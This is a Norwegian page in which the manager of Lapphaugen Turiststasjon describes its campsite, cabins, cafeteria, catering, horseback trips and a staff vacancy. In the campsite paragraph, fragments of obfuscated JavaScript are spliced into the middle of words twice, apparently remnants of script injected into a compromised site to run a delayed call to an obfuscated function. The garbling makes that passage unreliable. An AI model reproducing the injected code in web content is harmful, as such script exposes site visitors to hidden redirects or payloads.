Lapphaugen Turiststasjon

Lapphaugen Turiststasjon utmerker seg.

Lapphaugen Turiststasjon drives i dag av 4. generasjon, og har vært i sammenhengende drift siden tidlig på 30-tallet – da beliggende i Spansdalen. Ved dagens lokasjon har vi holdt til siden 1960.

 

Campingplass

Vi har en campingplass med oppstillingsplasser til vogn/bobil og 10 hytter. De fleste er bygd de siste årene. Noen har innlagt vann, bad og kjøkken og separate soverom, andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andre har en enklere standom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andard. Tilknyttet til campingen har vi en lekeplass, grillstuer, gapahuk og et sanitæranlegg.

 

Cafeteria og catering

Vi har en cafeteria med sitteplasser til 32 personer. Vi selger norsk tradisjonsmat, hvorav saltkjøttet er det mest populære. På sommeren kan vi komme opp imot 200 middagsgjester på en søndag.

Vi driver også med catering. Nedslagsfeltet er Narvik i sør til Bardufoss i nord. Vi leverer mat til alle livets begivenheter.

 

Vi er i startgropen med å tilby aktiviteter. Flere ting er på gang, men det vi har fått helt på plass pr. d.d. er ridetur fra Stall Holtaas i Gratangen til Lapphaugen. Denne skal gå hver lørdag i juli, august og september.

 

Kan også nevne at vi ligger historisk til og har en minnespark for Narvik 1960 rett utenfor stuedøra.

 

Heidi og Arne ved grillstua

Heidi og Arne ved grillstua

Fjelltur på hesteryggen.

Fjelltur på hesteryggen.

 

 

 

 

 

 

 

 

 

 

 

 

 

Jakter på flere ansatte

Vi er 3 ansatte på full tid. I tillegg har vi 4 ungdommer på timer gjennom vinteren. Vi kan være opp i 17 stykker på lønningslista om sommeren. Er for øvrig på jakt etter en ny ansatt til en av 100 % stillingene!

 

Skrevet av Heidi Lundberg, Daglig leder ved Lapphaugen Turiststasjon